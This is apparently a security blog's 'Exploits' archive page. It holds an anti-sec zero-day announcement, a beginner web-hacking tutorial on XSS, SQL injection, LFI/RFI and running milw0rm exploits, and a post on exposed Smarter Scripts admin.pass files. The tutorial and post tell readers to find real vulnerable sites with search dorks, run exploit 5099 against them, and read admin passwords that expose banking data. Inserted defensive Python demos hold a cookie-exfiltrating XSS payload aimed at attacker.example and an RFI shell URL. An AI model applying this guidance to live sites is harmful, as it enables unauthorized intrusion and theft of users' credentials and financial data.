Archive for the ‘Exploits’ Category
It would seem that the anti-sec movement is about to make a move that is arguably against the ethics laid out in their own manifesto. It was initially understood that being part of the Anti-Security Movement meant not disclosing vulnerabilities to the public. Well, please read on.
In a post to the full-disclosure mailing list, Anti-Sec announced their intention to publicly release working 0day exploit code for OpenSSH <= 5.2. As stated on Mon, 20 Jul 2009 16:32:18:
In 48 hours, the anti-sec movement will publicly unveil working exploit code
and full details for the zero-day OpenSSH vulnerability we discovered. It
will be posted to the Full-Disclosure security list.
Soon, the very foundations of Information Technology and Information
Security will be unearthed as millions upon millions of systems running ANY
version of OpenSSH are compromised by wave after wave of script-kiddie and
Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
anti-sec will be unleashing powerful computer worm source code with the
ability to automatically find and compromise systems running any and all
versions of OpenSSH.
This is an attack against all White Hat Hackers who think that running a
Penetration Test simply searching for known vulnerabilities is all they have
to do in order to receive their payment. Anti-sec will savor the moment when
White Hat Hackers are made to look like fools in the eyes of their clients.
Are you fucking serious? All this talk about how publicly released exploits are bad and how security through obscurity is the objective, and now you're going to release an exploit? How does this justify anti-sec’s cause? If you ask me this goes against everything their movement stands for. An OpenSSH 0day vulnerability must be too much to handle.
Earlier this evening I received some reports that Milw0rm.com, a very popular ‘Proof of Concept’ exploit website, is closing its doors.
str0ke just doesn't have the time anymore
Big loss to the skiddies out there? +10 to the anti-sec movement? Let’s hear your thoughts.
Here’s some further reading
This article introduces common website vulnerabilities and how they are exploited. As this is written for beginners, we will cover a variety of topics explaining some of the most common and useful website vulnerabilities, as well as how to find and exploit them. You should at least be comfortable using a computer and browsing the internet, and be able to recognise programming languages. I personally use Linux, but I am going to assume you use Microsoft Windows; at this point it really makes no difference. To start, this article covers types of vulnerabilities and how to use a site such as milw0rm.com to exploit a vulnerable site.
So to begin, let me explain the common vulnerabilities you will come across on the web. These are some of the most common and most talked about, and they are widely documented online; I am going to do my best to explain them in a way that is easy to understand. Let’s dive in!
XSS/CSS or Cross Site Scripting is one of many common vulnerabilities found in web applications on the internet. The term comes up frequently in web application security, as it is probably one of the most tested-for vulnerabilities alongside SQL Injection. Do not confuse the CSS abbreviation used in this article with Cascading Style Sheets, which is the preferred meaning of that acronym; I will use the preferred XSS for Cross Site Scripting. XSS is a form of code injection in which attacker-supplied script ends up in a web page viewed by other web surfers and runs in their browsers with the page's origin, which is what makes cookie and session theft possible. There are three primary types: persistent (stored on the server and served to every visitor), non-persistent (reflected back from the victim's own request) and DOM based (introduced by client-side script). I will not dwell on explaining each type; when identifying them, however, I will note which type it is for your reference.
SQL Injection, much like XSS, is an injection vulnerability, but it targets the database part of a website. It is commonly found in web applications that do not properly handle user-supplied data. Say you have a website that allows users to post comments: if the data you submit as a comment includes SQL syntax, and the website concatenates it straight into a query instead of filtering it or binding it as a parameter, you will likely be able to read, display or modify the website's database entries. Variants of SQL injection include Blind SQL injection (the application shows no query output, so results have to be inferred from its behaviour or timing) and incorrect type handling (a numeric parameter is never checked to be a number, so no quote is even needed to break out of the query).
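As an added example (not code from this article, and not the Mix Systems exploit discussed later), here is the comment board from the paragraph above written as a few Python functions, with sqlite3 standing in for the site's database. It shows both injection points introduced so far: the SQL injection in a lookup built by string concatenation, and the persistent XSS when the stored comment is written back into the page unescaped, each beside its hardened form. The table layout, the sample rows, the attacker inputs and the attacker.example host are all constructed for the demonstration.

```python
# Added example (not code from the original article): a minimal comment board
# showing a SQL injection point and a persistent XSS point, each beside the
# hardened version. Schema, rows and attacker inputs are constructed here.
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with a constructed users table and comments table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("CREATE TABLE comments (author TEXT, body TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("bob", "hunter2")])
    conn.executemany("INSERT INTO comments VALUES (?, ?)",
                     [("alice", "first post"), ("bob", "nice site")])
    return conn


def search_vulnerable(conn, author: str) -> list:
    """Builds the query by concatenation: the classic SQL injection bug."""
    query = "SELECT author, body FROM comments WHERE author = '" + author + "'"
    return conn.execute(query).fetchall()


def search_safe(conn, author: str) -> list:
    """Same lookup with a bound parameter; the input is data, never SQL."""
    return conn.execute(
        "SELECT author, body FROM comments WHERE author = ?", (author,)
    ).fetchall()


def render_vulnerable(comments) -> str:
    """Writes stored comment text straight into the HTML: persistent XSS."""
    return "".join(f"<li>{a}: {b}</li>" for a, b in comments)


def render_safe(comments) -> str:
    """Escapes every value on output so <, >, & and quotes stay inert."""
    return "".join(
        f"<li>{html.escape(a, quote=True)}: {html.escape(b, quote=True)}</li>"
        for a, b in comments
    )


# Constructed attacker inputs.
SQLI_PAYLOAD = "x' UNION SELECT name, password FROM users -- "
XSS_PAYLOAD = ("<script>document.location='http://attacker.example/?c='"
               "+document.cookie</script>")


def demo_injection() -> dict:
    conn = make_db()
    # The UNION payload makes the concatenated query return user credentials.
    leaked = search_vulnerable(conn, SQLI_PAYLOAD)
    # The parameterised query looks for an author literally named like the payload.
    safe = search_safe(conn, SQLI_PAYLOAD)
    # Store a comment containing script (via the safe insert), then render it
    # both ways: escaping on output is what stops the script from running.
    conn.execute("INSERT INTO comments VALUES (?, ?)", ("mallory", XSS_PAYLOAD))
    stored = search_safe(conn, "mallory")
    return {
        "leaked": leaked,
        "safe": safe,
        "vuln_html": render_vulnerable(stored),
        "safe_html": render_safe(stored),
    }


if __name__ == "__main__":
    for key, value in demo_injection().items():
        print(key, "->", value)
```

Note that the XSS comment is inserted with a parameterised statement and still ends up executable in the vulnerable renderer: parameter binding fixes the SQL problem only, and output escaping is a separate fix applied at the point where data meets HTML.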
LFI and RFI stand for Local File Inclusion and Remote File Inclusion respectively. LFI lets a user make the web application include (and, for script files, execute) a file already located on the server hosting the website, typically by supplying a path in a parameter that the application passes to an include call without checking it. An example would be a user uploading a malicious script through an image upload form, then getting the application to include that file so it runs. RFI, on the other hand, lets a user make the application include and execute a script that is not stored on the server but is fetched from another server or computer, by supplying a URL instead of a local path.
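An added example (not code from this article) of the include handler behind LFI and RFI, written in Python so it runs on its own: the vulnerable version joins the request parameter onto a base directory the way a PHP include("pages/" . $_GET['page']) would, and the hardened version allowlists the page name, refuses URLs and checks that the resolved path is still inside the intended directory. The site layout, the secret file standing in for something like /etc/passwd, and the attacker.example URL are constructed for the demonstration; the behaviour of a real remote include (fetching and executing the URL) is only reported, not performed.

```python
# Added example (not code from the original article): an include handler of the
# kind that causes LFI/RFI, beside a hardened version. The directory layout and
# request parameters are constructed here; nothing is fetched from the network.
import os
import tempfile
from urllib.parse import urlparse


def make_site() -> str:
    """Throwaway site: a web root with pages/ plus a sensitive file outside it."""
    root = tempfile.mkdtemp(prefix="lfi_demo_")
    pages = os.path.join(root, "htdocs", "pages")
    os.makedirs(pages)
    with open(os.path.join(pages, "home.txt"), "w") as f:
        f.write("welcome page")
    # Stands in for a sensitive file outside the document root (e.g. /etc/passwd).
    with open(os.path.join(root, "secret.conf"), "w") as f:
        f.write("db_password=hunter2")
    return root


def include_vulnerable(root: str, page: str) -> str:
    """Joins the parameter onto the base path unchecked. '../' walks out of
    pages/ (LFI); a URL would be fetched and executed by an interpreter that
    allows remote includes (RFI), which this demo only reports."""
    if page.startswith(("http://", "https://", "ftp://")):
        return f"RFI: would fetch and execute {page}"
    path = os.path.join(root, "htdocs", "pages", page)
    with open(path) as f:
        return f.read()


ALLOWED_PAGES = {"home", "about"}  # constructed allowlist of logical page names


def include_safe(root: str, page: str) -> str:
    """Hardened handler: allowlist the logical name, never accept a URL, and
    confirm the resolved path still lies under the pages directory."""
    if urlparse(page).scheme:
        raise ValueError("remote includes are not permitted")
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    base = os.path.realpath(os.path.join(root, "htdocs", "pages"))
    path = os.path.realpath(os.path.join(base, page + ".txt"))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes the pages directory")
    with open(path) as f:
        return f.read()


def demo_include() -> dict:
    """Run both handlers against a normal request and two malicious ones."""
    root = make_site()
    results = {
        "normal": include_vulnerable(root, "home.txt"),
        "lfi": include_vulnerable(root, "../../secret.conf"),
        "rfi": include_vulnerable(root, "http://attacker.example/shell.txt"),
    }
    for p in ("../../secret.conf", "http://attacker.example/shell.txt", "home"):
        try:
            results["safe:" + p] = include_safe(root, p)
        except ValueError as e:
            results["safe:" + p] = "rejected: " + str(e)
    return results


if __name__ == "__main__":
    for key, value in demo_include().items():
        print(key, "->", value)
```

The allowlist alone is enough to stop both attacks; the realpath check is kept as defence in depth for handlers that cannot enumerate their pages up front, and it is the part people get wrong when they only strip "../" from the string instead of checking where the path actually resolves.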
For the next part of this article I assume you don’t know what milw0rm.com is or how to use it. Milw0rm is, in my opinion, one of the best sites to find exploits. Since most of the vulnerabilities I have explained above are in web applications, we will be looking at the web app section of milw0rm.com. You will notice that using milw0rm is pretty self-explanatory; the only reason I am writing about it is that I have encountered many people who have absolutely no idea what to do there, or how to use the exploits found there.
This page lists exploits written for web applications. It shows the submission date, which is important because once an exploit is published the developers of the affected application will hurry to close the vulnerability. At the time of writing I will be looking at exploits submitted on February 10th – 11th, 2008, the most recently submitted ones. Let's look at http://www.milw0rm.com/exploits/5099, an exploit for Mix Systems Content Management System (CMS). This specific exploit is written in PHP and takes advantage of a remote SQL injection vulnerability. Identifying the language the exploit is written in is important, of course; normally you can tell from the beginning of the script. Some use PHP, others Perl, some Python; it just depends on what the author chose. Some exploits also give you instructions for using the script. The Mix Systems CMS exploit explains a usage scenario. Since I will be using the terminal/command line to run the script rather than a browser, this is the output I get when I run: php 5099.php
Usage: php 5099.php host type num_records
host: Your target ex www.target.com
type: 1 – plugin=katalog bug
2 – plugin=photogall bug
num_records: number or returned records(if 0 – return all)
example: php script.php site.com 10
It explains that in the terminal I would type something like php 5099.php host type num_records to run the script against a defined website, choosing which vulnerable part of the site to target and how many records to return/display. Pretty easy, right! Now you have to find a vulnerable website that uses Mix Systems CMS, which is easily done with a search engine dork (sometimes the exploit itself gives you a dork you can use).
Well, this is the end of Part 1 of An Introduction to Web Hacking – Vulnerabilities and Milw0rm. Please remember that milw0rm is not the only site offering exploits, and that these are not the only vulnerabilities out there to find. Do some reading and research, and stay tuned for the next article in this series. Cheers!
I don’t know just how well known this vulnerability is, but it is in my interest to shed some light on just how vulnerable this script is in its default state, meaning when it is installed “as is” without any “extra” programming or fixes. The Smarter Scripts freelancer script is a web application written in Perl (CGI) that lets a person set up a site like Scriptlance.com and the like. Finding a vulnerable installation only takes a search engine like Google or Yahoo, and if I’m not mistaken there is no secure version by default.
“Index of /” inurl:freelancers
What you're looking for in the links to the crawled space are URLs like /cgi-bin/freelancers or freelancers/data etc… Having directories listable on the web is dangerous in itself, especially if you're running a site that handles money. As it unfolds, within the Smarterscripts freelancer directory structure there lies a nifty little file called admin.pass, lol.
The file is a plain text file that stores the administrator password for the script, giving a would-be attacker access to the entire application backend, of course: member names with their passwords, banking information, balances, last IP, last login etc… are all stored here, along with the ability to download a backup of the so-called “database” and upload a backup to replace the existing one.
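As an added check (not code from this post, and nothing to do with Smarter Scripts' own code), here is a small Python scan that walks a web root looking for the two conditions described above: directories that would be listed if the server has directory indexes enabled (no index file present) and plain-text credential or backup files such as admin.pass sitting where the web server can serve them. The directory layout is constructed to mirror the paths the post mentions, and the index-file names and credential-file patterns are assumptions chosen for the demonstration, not a list taken from any particular product.

```python
# Added example (not code from the original post): walk a document root and
# flag listable directories and credential-looking files. The layout built by
# make_docroot() is constructed; the name patterns below are assumptions.
import os
import re
import tempfile

# Files a typical server treats as a directory index (assumed set).
INDEX_FILES = {"index.html", "index.htm", "index.cgi", "index.pl", "index.php"}
# File names that should never be reachable through the web server (assumed).
CREDENTIAL_NAME = re.compile(r"(\.pass|\.pwd|passwd|password|\.bak|\.sql)$", re.I)


def _write(path: str, text: str) -> None:
    with open(path, "w") as f:
        f.write(text)


def make_docroot() -> str:
    """Constructed web root mirroring the directory names the post mentions."""
    root = tempfile.mkdtemp(prefix="docroot_")
    data = os.path.join(root, "cgi-bin", "freelancers", "data")
    os.makedirs(data)
    os.makedirs(os.path.join(root, "images"))
    _write(os.path.join(root, "index.html"), "<html>front page</html>")
    _write(os.path.join(root, "images", "index.html"), "")
    _write(os.path.join(root, "cgi-bin", "freelancers", "freelancers.cgi"),
           "#!/usr/bin/perl\n")
    _write(os.path.join(data, "admin.pass"), "s3cret\n")   # plain-text admin password
    _write(os.path.join(data, "members.dat"), "bob:hunter2\n")
    return root


def scan_docroot(root: str) -> dict:
    """Return directories with no index file and files matching CREDENTIAL_NAME,
    both as paths relative to the web root using '/' separators."""
    listable, credentials = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        if not INDEX_FILES & set(filenames):
            listable.append(rel)
        for name in filenames:
            if CREDENTIAL_NAME.search(name):
                credentials.append(name if rel == "." else rel + "/" + name)
    return {"listable": sorted(listable), "credentials": sorted(credentials)}


if __name__ == "__main__":
    findings = scan_docroot(make_docroot())
    for kind, paths in findings.items():
        print(kind + ":")
        for p in paths:
            print("  " + p)
```

A hit in the listable set only becomes a directory listing if the server has indexes enabled for that path, and a credential file only matters if the server will actually serve it, so treat the output as a list of candidates to verify (or to fix by moving the data outside the document root and disabling indexes) rather than as confirmed exposure.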